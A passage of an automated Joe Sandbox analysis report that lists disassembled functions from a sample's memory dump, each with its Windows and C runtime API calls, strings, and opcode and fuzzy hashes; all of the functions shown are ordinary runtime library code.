API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: ae2a524f3bae7ec111a1b01d628d9c5b576ef457a66ff6732aaa120cdcb48f30
Instruction ID: bd24ac8a29d18b4c4c504e6f35ddc594831af518d3d19c43984c8b871dfefa61
Opcode Fuzzy Hash: ae2a524f3bae7ec111a1b01d628d9c5b576ef457a66ff6732aaa120cdcb48f30
Instruction Fuzzy Hash: 95B1E535500705CBCB389B64CC92BB7B3F9EF5430AF14492DEEA29A580EF75A989C710

Uniqueness

Uniqueness Score: -1.00%

Function 00144BDE Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00144BE4
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00144BF2
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00144C03
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00144C14

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00144BF8
GetCurrentPackageId, xrefs: 00144BEC
kernel32.dll, xrefs: 00144BDF
GetTempPath2W, xrefs: 00144C09

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 42c1dae80e5deed4c9e975c27bcabf940ad1e936e483555d825e7a8e677d5135
Instruction ID: 1f9bcf1179cbea4ba924a96a34b69f1e69d4c5103282db03e7eed7888e284d19
Opcode Fuzzy Hash: 42c1dae80e5deed4c9e975c27bcabf940ad1e936e483555d825e7a8e677d5135
Instruction Fuzzy Hash: DFE0EC71D56720EBDB146F74BC8D89B3EE8BB09793705015AF811DA9A0DBB015C58B50

Uniqueness

Uniqueness Score: -1.00%

Function 00142630 Relevance: 13.5, APIs: 9, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 00142642
RegCloseKey.ADVAPI32(00000000), ref: 0014264D
RegCloseKey.ADVAPI32(00000000), ref: 00142658
RegCloseKey.ADVAPI32(00000000), ref: 00142663
RegCloseKey.ADVAPI32(00000000), ref: 0014266E
RegCloseKey.ADVAPI32(00000000), ref: 00142679
RegCloseKey.ADVAPI32(00000000), ref: 00142684
RegCloseKey.ADVAPI32(00000000), ref: 0014268F
RegCloseKey.ADVAPI32(00000000), ref: 0014269A

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 90f3415a24370d434fcd4026727fab3c6a56502f1788b5e4cb86ecd7cce9312e
Instruction ID: a28bb64ae5b7e984787a980ba34c850681aef4de03aa894cb0330f75c1abb986
Opcode Fuzzy Hash: 90f3415a24370d434fcd4026727fab3c6a56502f1788b5e4cb86ecd7cce9312e
Instruction Fuzzy Hash: E401810834CBC495E3717B788C29F6A9E802F4272EF07464DF2EE290D6C7901000C692

Uniqueness

Uniqueness Score: -1.00%

Function 001485F8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00148717
___TypeMatch.LIBVCRUNTIME ref: 00148825
_UnwindNestedFrames.LIBCMT ref: 00148977
CallUnexpected.LIBVCRUNTIME ref: 00148992

Strings

csm, xrefs: 0014874E
csm, xrefs: 001486A2
csm, xrefs: 00148635

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 4bb60307612eedc91c66e9b1173897c0e67673fc7c96eac1017211b8f067d783
Instruction ID: 7a9dbcca8f834c259a268905d7d965eb1b9b3ec4873a13b49a043a58300e9c32
Opcode Fuzzy Hash: 4bb60307612eedc91c66e9b1173897c0e67673fc7c96eac1017211b8f067d783
Instruction Fuzzy Hash: E2B16C71C00609EFCF29EFA4C8819AEBBB5FF54314B15415AE8116B222DB71DA51CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00152820 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00152A99

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 31538f32eb1aaf2da369e817bf49539b78bff57d49d29beacca3d2c130d052b0
Instruction ID: cf3579487f6215d00150a42f1833888319c3d93c9614b6704d4d2aaa32459a76
Opcode Fuzzy Hash: 31538f32eb1aaf2da369e817bf49539b78bff57d49d29beacca3d2c130d052b0
Instruction Fuzzy Hash: D7B1F472A04249EFDB15DF98C8C0BAD7BB1BF96305F144158E8219F3A1D7709D89CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0015BE39 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(014EFDD0,014EFDD0,?,7FFFFFFF,?,0015C109,014EFDD0,014EFDD0,?,014EFDD0,?,?,?,?,014EFDD0,?), ref: 0015BEDF
__alloca_probe_16.LIBCMT ref: 0015BF9A
__alloca_probe_16.LIBCMT ref: 0015C029
__freea.LIBCMT ref: 0015C074
__freea.LIBCMT ref: 0015C07A
__freea.LIBCMT ref: 0015C0B0
__freea.LIBCMT ref: 0015C0B6
__freea.LIBCMT ref: 0015C0C6

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 2318b2bdb82468ef42bed9adca75af91527a2bbd6db4da0047a2cb621f431525
Instruction ID: 5783bacee5e0325afc220cceb70ccb4c1c782b94b242d96c43a31c2c1c11384c
Opcode Fuzzy Hash: 2318b2bdb82468ef42bed9adca75af91527a2bbd6db4da0047a2cb621f431525
Instruction Fuzzy Hash: C471C376904309EFDF219E64CC82BAFB7A59F59312F290016FD24AF2C1D7359D488BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00144C81 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00144CCA
__alloca_probe_16.LIBCMT ref: 00144CF6
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00144D35
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00144D52
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00144D91
__alloca_probe_16.LIBCMT ref: 00144DAE
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00144DF0
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00144E13

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: c344fff97afb482093a9a29edcc5711051859bafe9ad1b63f2be794ed01266e0
Instruction ID: 5efd97513ef9a2c0bb2b423f00ec13f01a79f2cfc2c0aeff079d261ce4697dde
Opcode Fuzzy Hash: c344fff97afb482093a9a29edcc5711051859bafe9ad1b63f2be794ed01266e0
Instruction Fuzzy Hash: 3751BD7290021AAFEF209FA0CC81FAF7BA9FF54751F154428F904AA1A0D739DD50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00148090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001480C7
___except_validate_context_record.LIBVCRUNTIME ref: 001480CF
_ValidateLocalCookies.LIBCMT ref: 00148158
__IsNonwritableInCurrentImage.LIBCMT ref: 00148183
_ValidateLocalCookies.LIBCMT ref: 001481D8

Strings

csm, xrefs: 0014816D

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: fa4c39f8565905f0bde8238964e955bb7f389b6b8a579b888e0a4b20e37c7d10
Instruction ID: e8a7033691aeaa7d2f5911184823c2cafff73af26f96d6835fb9f856e0c77ccd
Opcode Fuzzy Hash: fa4c39f8565905f0bde8238964e955bb7f389b6b8a579b888e0a4b20e37c7d10
Instruction Fuzzy Hash: 4A419534A00219EFCF10DF68CC84A9EBBF5AF45714F148056E9186B362DB71EE56CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00142B6E Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00142B75
std::_Lockit::_Lockit.LIBCPMT ref: 00142B7F
int.LIBCPMT ref: 00142B96

Part of subcall function 00143062: std::_Lockit::_Lockit.LIBCPMT ref: 00143073
Part of subcall function 00143062: std::_Lockit::~_Lockit.LIBCPMT ref: 0014308D

codecvt.LIBCPMT ref: 00142BB9
std::_Facet_Register.LIBCPMT ref: 00142BD0
std::_Lockit::~_Lockit.LIBCPMT ref: 00142BF0
Concurrency::cancel_current_task.LIBCPMT ref: 00142BFD

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 4c24d29bb92d6137a1025324c4cd5c84ac2806391dd1015ba4b767db442c454b
Instruction ID: 10b292c34984318f9334436ea05b977f0049909dd0718a31167f5c7efb6acc77
Opcode Fuzzy Hash: 4c24d29bb92d6137a1025324c4cd5c84ac2806391dd1015ba4b767db442c454b
Instruction Fuzzy Hash: 0701D23290021A9BCF05EF64DC45AAD7B75BFA0720F644108F820AB2B1CF709E81C790

Uniqueness

Uniqueness Score: -1.00%

Function 0014828A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00148281,001469B9,00145B44), ref: 00148298
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001482A6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001482BF
SetLastError.KERNEL32(00000000,00148281,001469B9,00145B44), ref: 00148311

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c4922cfe2645028122abbd6e0ebdcc0d373f17012a12cf9a55ee08c3599db3ac
Instruction ID: 3cb34ef4556e028d7b6369625af41e693009b53dae7ac47123783df03712fd1f
Opcode Fuzzy Hash: c4922cfe2645028122abbd6e0ebdcc0d373f17012a12cf9a55ee08c3599db3ac
Instruction Fuzzy Hash: 1101DB3220D7255EA6242FB4BC89E6F2794EF12B797304329F514958F2EF918C42D645

Uniqueness

Uniqueness Score: -1.00%

Function 00142C03 Relevance: 9.0, APIs: 6, Instructions: 34COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00142C0A
std::_Lockit::_Lockit.LIBCPMT ref: 00142C14
int.LIBCPMT ref: 00142C2B

Part of subcall function 00143062: std::_Lockit::_Lockit.LIBCPMT ref: 00143073
Part of subcall function 00143062: std::_Lockit::~_Lockit.LIBCPMT ref: 0014308D

ctype.LIBCPMT ref: 00142C4E
std::_Lockit::~_Lockit.LIBCPMT ref: 00142C85

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3ctype
String ID:
API String ID: 3358926169-0
Opcode ID: db315a97109f1a5b8fb4548db3626686b484d3a5108da93ab3b181f1a8176978
Instruction ID: bac211feb67e19a0ca3d97d2226886056b2b5f6d68f88441508ec6c8ac602a5f
Opcode Fuzzy Hash: db315a97109f1a5b8fb4548db3626686b484d3a5108da93ab3b181f1a8176978
Instruction Fuzzy Hash: F7F0B43190051A9BCB05FBA0C9927BE3625AF60B61F544518F8207B1F1DF709F458791

Uniqueness

Uniqueness Score: -1.00%

Function 0014CFD5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F39A3E3B,?,?,00000000,0015CB24,000000FF,?,0014CF65,00000002,?,0014CF39,00149B7B), ref: 0014D00A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0014D01C
FreeLibrary.KERNEL32(00000000,?,?,00000000,0015CB24,000000FF,?,0014CF65,00000002,?,0014CF39,00149B7B), ref: 0014D03E

Strings

mscoree.dll, xrefs: 0014D003
CorExitProcess, xrefs: 0014D014

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 52408249ab6a8a3321e1baba75ebd8f71c9a6c5636fe7c538db685e6e574a583
Instruction ID: e0f5db1147df455555d5ecb7e13c756d05ee7d07c6cb073bfd9b4d961e97e7cc
Opcode Fuzzy Hash: 52408249ab6a8a3321e1baba75ebd8f71c9a6c5636fe7c538db685e6e574a583
Instruction Fuzzy Hash: 21016231944719EFDB219F50EC09BAFBBB9FB44B56F000529F821A76E0DBB49941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00153BC5 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00153C4C
__alloca_probe_16.LIBCMT ref: 00153D0D
__freea.LIBCMT ref: 00153D74

Part of subcall function 00152FA5: RtlAllocateHeap.NTDLL(00000000,00156DAA,?,?,00156DAA,00000220,?,00000000,?), ref: 00152FD7

__freea.LIBCMT ref: 00153D89
__freea.LIBCMT ref: 00153D99

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: a6e46b93331f440530c119b54a24f9cd306704e72bbe13d3a3d366880e288307
Instruction ID: 1ff4a3e0a1c4c88df70d63ed83322790104a8e92f19d6bc26724085f3dbbf0ed
Opcode Fuzzy Hash: a6e46b93331f440530c119b54a24f9cd306704e72bbe13d3a3d366880e288307
Instruction Fuzzy Hash: CC51D272600246EBEB259EA4CC45EBB76B9EF14392F550129FD39EF110E731CE188760

Uniqueness

Uniqueness Score: -1.00%

Function 00142DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00142DD3
std::_Lockit::_Lockit.LIBCPMT ref: 00142DE0
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00142E1D

Part of subcall function 0014466F: _Yarn.LIBCPMT ref: 0014468E
Part of subcall function 0014466F: _Yarn.LIBCPMT ref: 001446B2

Strings

bad locale name, xrefs: 00142E2E

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 482894088-1405518554
Opcode ID: 40940e203507ca5e06347ec40622806eb80485289970e5fa9036f43f272dd07a
Instruction ID: 2632e6a48c95d1ec1a6c54868a7751b2abb7b1a7e540e09d08afb72bb0834e6b
Opcode Fuzzy Hash: 40940e203507ca5e06347ec40622806eb80485289970e5fa9036f43f272dd07a
Instruction Fuzzy Hash: 74018071501B54DFC730AF6A944154AFFE0BF29750B80892FF58ED7A11D730A544CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 001493D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,00149383,00000000,00000001,0016B6B4,?,?,?,00149526,00000004,InitializeCriticalSectionEx,0015ED98,InitializeCriticalSectionEx), ref: 001493DF
GetLastError.KERNEL32(?,00149383,00000000,00000001,0016B6B4,?,?,?,00149526,00000004,InitializeCriticalSectionEx,0015ED98,InitializeCriticalSectionEx,00000000,?,001492DD), ref: 001493E9
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,001481F3), ref: 00149411

Strings

api-ms-, xrefs: 001493F6

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 103de047de939ce238f8a4859741727877247c693d74d9b2361ab252a8ff83db
Instruction ID: d5de744b6ddf76184a2e45cb7cf4a77f9cbb02368d67f137e6d052a3eaa2adea
Opcode Fuzzy Hash: 103de047de939ce238f8a4859741727877247c693d74d9b2361ab252a8ff83db
Instruction Fuzzy Hash: F7E09274740304FBDE602BA1FD0BB5A3E559B10B55F144430FA0CAC4F5D7A1D9529695

Uniqueness

Uniqueness Score: -1.00%

Function 00150D72 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(F39A3E3B,00000000,00000000,00149E6D), ref: 00150DD5

Part of subcall function 00155E9B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00153D6A,?,00000000,-00000008), ref: 00155F47

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00151030
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00151078
GetLastError.KERNEL32 ref: 0015111B

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 3ffef7e7d98a5809bd03704aedc5a37de50cd0176d3111e3e3643efce4f76cfa
Instruction ID: 396dabe268773843729bc39143b14e9b047cd48535f5234f8baf1fdcf1ffb5a4
Opcode Fuzzy Hash: 3ffef7e7d98a5809bd03704aedc5a37de50cd0176d3111e3e3643efce4f76cfa
Instruction Fuzzy Hash: D0D148B5D04248EFCF16CFA8D880AEDBBB5FF08305F18456AE925EB251D730A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001483A1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00148468
___AdjustPointer.LIBCMT ref: 0014848B
___AdjustPointer.LIBCMT ref: 00148527

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

